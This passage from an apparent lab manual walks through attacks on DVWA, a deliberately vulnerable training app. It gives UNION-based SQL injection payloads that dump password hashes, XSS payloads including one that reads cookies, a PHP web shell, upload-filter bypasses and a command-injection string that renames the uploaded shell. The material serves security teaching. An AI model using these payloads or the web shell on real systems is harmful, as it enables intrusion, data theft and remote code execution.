Now we know that the database is MariaDB and its version 10.1.16

Type into the User ID Field:

3’ and 1=0 union select null, user() #

 Figure 6.17 Screenshot of PLABKALI01: DVWA SQL Injection results.

The main user here is root@localhost.

Type into the User ID Field:

3’ and 1=0 union select null, database() #

 Figure 6.18 Screenshot of PLABKALI01: DVWA SQL Injection results.

The database is confirmed now belonging to DVWA.

Step 5

Type into the User ID Field click Submit:

3’ and 1=0 union select null,table_name from

information_schema.tables #
 Figure 6.19 Screenshot of PLABKALI01: DVWA SQL Injection results.

We are now presented with column headings through the table of the database. We can see that there are a lot of
different headings within this database. Take a moment to scanthrough the different listings and you will see that
there are columns for user privileges and a variety of statistical information which are held in the database.

Type into the User ID Field:

3’ and 1=0 union select null,table_name from information_schema.tables wheretable_schema!=’mysql’ and

table_schema!=’information_schema’ #
 Figure 6.20 Screenshot of PLABKALI01: DVWA SQL Injection results.

This command has brought up information about the account columns by calling on the schema which contains
those details. We see an that we have accessed information aboutthe guestbook, users and accounts fields.

Type into the User ID Field:

3’ and 1=0 union select null,table_name from information_schema.columns wheretable_name=’users’ #

 Figure 6.21 Screenshot of PLABKALI01: DVWA SQL Injection results.

Here we have picked out the column for only the users. We will now work on that columnspecifically.

Step 6

Type into the User ID Field:

3’ and 1=0 union select

null,concat(table_name,0x0a,column_name) from
information_schema.columns where table_name=’users’ #
 Figure 6.22 Screenshot of PLABKALI01: DVWA SQL Injection results.

Here we are beginning to produce really interesting results showing the Information about users, first names and
last names. We can also see that they use an avatar and there is a field for the number of failed logins together
with the list of connections to thesystem.

Type into the User ID Field and click Submit:

3’ and 1=0 union select null,concat(first_name,0x0a,password) from users #

 Figure 6.23 Screenshot of PLABKALI01: DVWA SQL Injection results.

We now have the information of the first name and the password hash values.Now we must

carefully record this information into leaf pad.

Copy and paste the details directly from the DVWA page.
 Figure 6.24 Screenshot of PLABKALI01: DVWA SQL Injection results.

Copy these details, remember to right-click on the screen and use the menu items. Stay

logged into PLABKALI01, minimize Firefox ESR and move onto the next exercise
 EXPERIMENT- 7

AIM: Cross-Site Scripting (XSS): Exploit XSS vulnerabilities in DVWA to inject

malicious scripts into web pages. Show the potential impact of XSS attacks, such
as stealing cookies or defacing websites.

XSS is a technique in which attackers inject malicious scripts into a target website and may allow

them to gain access control of the website. If a website allows users to input data like comment,

username field and email address field without controls then attacker can insert malicious code
script as well.

TYPES OF XSS:

1. Reflected XSS

2. Stored XSS

3. Dom Base XSS

Reflected XSS(cross site scripting):RXSS

In this case, hacker data is not stored on the website. reflected XSS only execute on the victim side.

reflected cross-site scripting A hacker sends input script that website then reflected back to the

victim’s browser, where hacker it executed the malicious JavaScript payloads.

Let’s try cross site scripting virtual environment

Requirements:

1. Xampp or wamp
2. DVWA (Damn vulnerable web application)

3. Browser like Firefox, explorer, Cyberfox, Chrome e.t.c

DVWA low level Reflected XSS:

Payload: <script>alert(“xss”)</script>

DVWA Medium Level Reflected XSS

Payload : <Script>alert(“hack by falcon”)</Script>

DVWA High Level Reflected XSS

Payload: <img src=x onerror=alert(“falcon”)>

Stored XSS (Cross site scripting):SXSS

Stored cross-site scripting (XSS) In this case the hacker malicious code is stored target website and

the web server. when an attacker can send malicious JavaScript into the website and that script is
executed other users’ computers that is stored (XSS) cross-site scripting.

DVWA Low Level Stored XSS:

Payload: <script>alert(document.domain)</script>
DVWA Medium Level Stored XSS

Payload : <img src=x onerror=alert(document.domain)>

DVWA High Level Stored XSS

Payload : <body onload=alert(“bingo”)>

DOM BASE XSS:

Dom base (XSS) cross-site scripting attack is a short-form document object model based cross-site

scripting. That is, the page itself HTTP response does not change, An attacker may use several

DOM objects to create a Cross-site Scripting attack. The most popular objects from this perspective

are documents.URL, document.location, and document.referrer.

DVWA low level DOM XSS:

Payload: localhost/dvwa/vulnerabilities/xss_d/?default=<script>alert(1)</script>
DVWA Medium level DOM BASE:

Payload: localhost/dvwa/vulnerabilities/xss_d/?default=English#<script>alert(1)</script> and

reload your browser.

DVWA HIGH LEVEL DOM BASE:

Payload:
localhost/dvwa/vulnerabilities/xss_d/?default=English#<script>alert(document.cookie)</script
> and reload browser.
 EXPERIMENT- 8

AIM: File Inclusion Vulnerabilities: Explore remote and local file inclusion
vulnerabilities in DVWA. Show how attackers can include malicious files on a
server and execute arbitrary code.

LOW: (No restrictions. Any file types are allowed)

Open any editor and create a file. Write following code for creating a web shell.
<?php
$cmd=$_GET['cmd'];
system($cmd);
?>

Now save the file as ‘file1.php’

Upload the file and it will be
uploaded.
To check whether the shell is running, go to
“127.0.0.1/DVWA/hackable/uploads/file1.php?cmd=pwd”, command will be
executed.

MEDIUM: (Only image file types i.e. JPEG, PNG are

allowed)Write the same web shell but save it by name
‘file2.php.png’

Select the file, but before uploading it, open Burp Suite and turn the interceptor
on.Then upload the file the request will be intercepted in Burp.
In Burp interceptor, change the extension again by editing the file name to
‘file2.php’.Forward the request. File will be uploaded.
Go to “127.0.0.1/DVWA/hackable/uploads/file1.php?cmd=pwd” and check.

HIGH: Uses getimagesize() function, so the file signature should be of image

only.We will edit file signatures in Hexadecimal editor
Write the same web shell and save it as file3.png. Use xxd editor to edit file signatures.
# apt-get install xxd# apt-get
update

# xxd file3.png hexdump#

gedit hexdump

Now go to link (https://www.garykessler.net/library/file_sigs.html)

Copy file signatures for PNG file and paste it at the beginning of the Hex code of png file in
geditor.

Convert the hex code back to image file

# xxd -r hexdump file4.png
Now upload the file. It will be uploaded but it is an image file and not an executable. Now to
renameit, use command injection vulnerability. Go to command injection and insert
following command.

127.0.0.1 |mv ../../hackable/uploads/file4.png ../../hackable/uploads/file4.php

Now the uploaded file should be an executable one